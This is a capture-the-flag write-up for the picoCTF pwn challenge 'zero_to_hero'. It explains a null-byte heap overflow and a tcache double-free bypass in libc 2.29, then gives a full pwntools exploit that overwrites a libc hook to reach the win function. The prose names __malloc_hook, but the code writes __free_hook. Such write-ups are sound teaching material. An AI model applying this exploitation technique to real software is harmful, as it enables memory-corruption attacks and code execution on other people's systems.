---
name: zero_to_hero
points: 500
category: pwn
author: ewn10
---

We've got a stripped binary, a libc, and another heap challenge. After
decompiling it, we can see it looks a lot like sice_cream; we've got a maximum
of 7 allocations, we can free any chunk we've gotten as many times as we want,
and we've got a win function, this time with no arguments required. The program
conveniently gives us a libc address, so we won't need to leak that. Careful
inspection shows us we have a null byte overflow again:

```c
pcVar2 = strings[(long)slot];
sVar2 = read(0,strings[(long)slot],(ulong)len);
pcVar2[sVar2] = '\0';
```

With libc verison 2.29, we've got tcache enabled, and a double free check in
tcache---if a value in the chunk matches what `free` would write into it upon
freeing it, `free` walks the entire free list for chunks of that size to make
sure that the address we're freeing isn't already in there. However, our null
byte overflow lets us change the size, so we can quite easily get the chunk onto
a different free list and pass this check. The `next` pointer still isn't
checked, so we'll point it to `__malloc_hook` and set it to our win function.

## Full exploit

```python
#!/usr/bin/env python2
from pwn import *

context.binary = './zero_to_hero'

libc = ELF('./libc.so.6')

if True:
    p = connect('2019shell1.picoctf.com', 49928)
else:
    p = context.binary.process()

f_win = 0x00400a02

SLOT_MAX = 7
slot_counter = 0

def create(size, contents):
    global slot_counter
    if slot_counter >= SLOT_MAX:
        raise RuntimeError('Out of slots')
    if size > 0x408:
        raise ValueError('Allocation too large')
    slot = slot_counter
    slot_counter += 1
    log.debug('Creating size {:x} @ {}'.format(size, slot))
    p.sendlineafter('Exit\n> ', '1')
    p.sendlineafter('?\n> ', str(size))
    p.sendafter(': \n> ', contents)
    return slot

def free(slot):
    log.debug('Freeing slot {}'.format(slot))
    p.sendlineafter('Exit\n> ', '2')
    p.sendlineafter('?\n> ', str(slot))

def slot_info():
    log.info('{} slots used ({} remaining)'.format(slot_counter, SLOT_MAX - slot_counter))

p.sendlineafter('?\n', 'y')
p.recvuntil('Take this: 0x')
libc_system = int(p.recvuntil('\n', drop=True), 16)
libc_base = libc_system - libc.symbols['system']
libc.address = libc_base
log.success('libc@0x{:016x}'.format(libc_base))

with log.progress('Setup double free'):
    ca = create(0x78, 'A'*0x78) # overflow chunk
    cb = create(0x178, 'B'*0x178) # target chunk
    cc = create(0x178, 'C'*0x178) # tcache padding
    free(cc)
    free(ca)
    free(cb)
    ca2 = create(0x78, 'a'*0x78) # overflow
    free(cb) # different tcache bin now
slot_info()
with log.progress('Write to malloc_hook'):
    cb2 = create(0xf8, p64(libc.symbols['__free_hook']))
    cb3 = create(0x178, 'b'*8)
    cp_malloc_hook = create(0x178, p64(f_win))
slot_info() # just barely!
free(0) # prints flag
log.info('Flag: {}'.format(p.recvline()))
```
